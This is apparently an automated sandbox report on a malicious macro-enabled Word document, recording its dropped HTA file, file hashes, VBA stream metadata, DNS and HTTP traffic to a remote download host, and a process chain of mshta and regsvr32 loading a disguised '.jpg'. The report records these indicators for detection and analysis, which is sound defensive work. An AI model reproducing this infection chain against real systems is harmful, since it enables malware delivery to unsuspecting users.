                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Desktop\~$arge_12.01.2021.doc
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Documents\youTube.hta (copy)
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3342
                                                                                                                                                        Entropy (8bit):5.787478297876638
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                                                                                                                                                        MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                                                                                                                                                        SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                                                                                                                                                        SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                                                                                                                                                        SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>
                                                                                                                                                        C:\Users\user\Documents\~$ouTube.hta
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Documents\~WRD0000.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3342
                                                                                                                                                        Entropy (8bit):5.787478297876638
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                                                                                                                                                        MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                                                                                                                                                        SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                                                                                                                                                        SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                                                                                                                                                        SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                                                        Entropy (8bit):7.789270534017578
                                                                                                                                                        TrID:
                                                                                                                                                        • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                        • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                        File name:charge_12.01.2021.doc
                                                                                                                                                        File size:34322
                                                                                                                                                        MD5:18499830201cddade8183b8e24fdf30a
                                                                                                                                                        SHA1:55c498cf7273cab567f49a00c15ca3316c001215
                                                                                                                                                        SHA256:0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
                                                                                                                                                        SHA512:0a59ed2f3491bbd547d3ae543c6efcf965d1da65c02f900b09d6c75afd92dfc98c4182af7392b9d77b79cf0c17fe30d232449396a3a3be14c96b07ce7718928e
                                                                                                                                                        SSDEEP:768:JouYXWQ6W02VWnZdw9822zARtrLfxl1Isq:mLmxfcWwkyNLfx4
                                                                                                                                                        File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "/opt/package/joesandbox/database/analysis/532355/sample/charge_12.01.2021.doc"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:False
                                                                                                                                                        Application Name:unknown
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:
                                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Summary

                                                                                                                                                        Title:
                                                                                                                                                        Subject:
                                                                                                                                                        Author:aqbhmx
                                                                                                                                                        Keywords:ath.ebuTuoy
                                                                                                                                                        Template:Normal
Last Saved By:Пользователь Windows
Revision Number:2
                                                                                                                                                        Total Edit Time:0
                                                                                                                                                        Create Time:2021-12-01T11:28:00Z
                                                                                                                                                        Last Saved Time:2021-12-01T11:28:00Z
                                                                                                                                                        Number of Pages:1
                                                                                                                                                        Number of Words:116
                                                                                                                                                        Number of Characters:9905
                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                        Security:0

                                                                                                                                                        Document Summary

                                                                                                                                                        Number of Lines:55
                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                        Company:
                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                        Shared Document:false
                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                        Application Version:16.0000

                                                                                                                                                        Streams with VBA

                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 2131
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/ThisDocument
                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                        Stream Size:2131
                                                                                                                                                        VBA Code
                                                                                                                                                        VBA File Name: main.bas, Stream Size: 1148
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/main
                                                                                                                                                        VBA File Name:main.bas
                                                                                                                                                        Stream Size:1148
                                                                                                                                                        VBA Code

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 406
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECT
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Stream Size:406
                                                                                                                                                        Entropy:5.30459067678
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:I D = " { 4 C 4 C B 6 7 3 - B F A 3 - 4 F 2 A - A F 5 A - A 6 3 2 A C 7 9 3 7 5 A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 F 9 D 8 D 3 0 B 3 5 0 5 6 5 4 5 6 5 4 5 6 5 4 5 6 5 4 " . . D P B = " 3 E 3 C 2 C D 1 5 4 E F F 2 F 0 F 2 F 0 F 2 " . . G C = " D D D F C F 6 E F 1 0 C F 2 0 C F 2 F 3 " . . . . [
                                                                                                                                                        Stream Path: PROJECTwm, File Type: data, Stream Size: 56
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECTwm
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:56
                                                                                                                                                        Entropy:3.05665670746
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                                                                                                                                                        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2864
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:2864
                                                                                                                                                        Entropy:4.29981377884
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                                        Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1667
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_0
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:1667
                                                                                                                                                        Entropy:3.52769533528
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . O - . . % . J . i . . x - a ] . . . . . . . . . . .
                                                                                                                                                        Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 232
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_1
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:232
                                                                                                                                                        Entropy:2.20499301264
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y o u D o o r N e x t . . . . . . . . . . . . . . . . y o u L o a d X . . . . . . . . . . . . . . .
                                                                                                                                                        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 799
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_2
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:799
                                                                                                                                                        Entropy:1.96552857808
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 314
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_3
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:314
                                                                                                                                                        Entropy:2.19683844969
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Stream Path: VBA/dir, File Type: data, Stream Size: 552
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/dir
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:552
                                                                                                                                                        Entropy:6.3505975093
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. $ . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . t . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 04:27:03.028362989 CET | 49745 | 80 | 192.168.2.3 | 194.62.42.207
Dec 2, 2021 04:27:03.107618093 CET | 80 | 49745 | 194.62.42.207 | 192.168.2.3
Dec 2, 2021 04:27:03.107745886 CET | 49745 | 80 | 192.168.2.3 | 194.62.42.207
Dec 2, 2021 04:27:03.108318090 CET | 49745 | 80 | 192.168.2.3 | 194.62.42.207
Dec 2, 2021 04:27:03.187299967 CET | 80 | 49745 | 194.62.42.207 | 192.168.2.3
Dec 2, 2021 04:27:03.621062040 CET | 80 | 49745 | 194.62.42.207 | 192.168.2.3
Dec 2, 2021 04:27:03.623538017 CET | 49745 | 80 | 192.168.2.3 | 194.62.42.207
Dec 2, 2021 04:27:06.851485968 CET | 49745 | 80 | 192.168.2.3 | 194.62.42.207

                                                                                                                                                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 04:27:02.987498045 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8
Dec 2, 2021 04:27:03.016952038 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3

                                                                                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 2, 2021 04:27:02.987498045 CET | 192.168.2.3 | 8.8.8.8 | 0x942f | Standard query (0) | winrentals2017b.com | A (IP address) | IN (0x0001)

                                                                                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 2, 2021 04:27:03.016952038 CET | 8.8.8.8 | 192.168.2.3 | 0x942f | No error (0) | winrentals2017b.com | | 194.62.42.207 | A (IP address) | IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • winrentals2017b.com

                                                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49745 | 194.62.42.207 | 80 | C:\Windows\SysWOW64\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 04:27:03.108318090 CET | 1237 | OUT | GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: winrentals2017b.com
Connection: Keep-Alive
Dec 2, 2021 04:27:03.621062040 CET | 1237 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Dec 2021 03:27:03 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
X-Powered-By: PHP/7.2.34
Content-Length: 203
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "cab3" was not found on this server.</p></body></html>


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior


                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:52
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                        Imagebase:0xe70000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:59
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:explorer youTube.hta
                                                                                                                                                        Imagebase:0xc00000
                                                                                                                                                        File size:3611360 bytes
                                                                                                                                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:59
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                        Imagebase:0x7ff720ea0000
                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:04:27:01
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                        Imagebase:0x100000
                                                                                                                                                        File size:13312 bytes
                                                                                                                                                        MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:04:27:03
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis
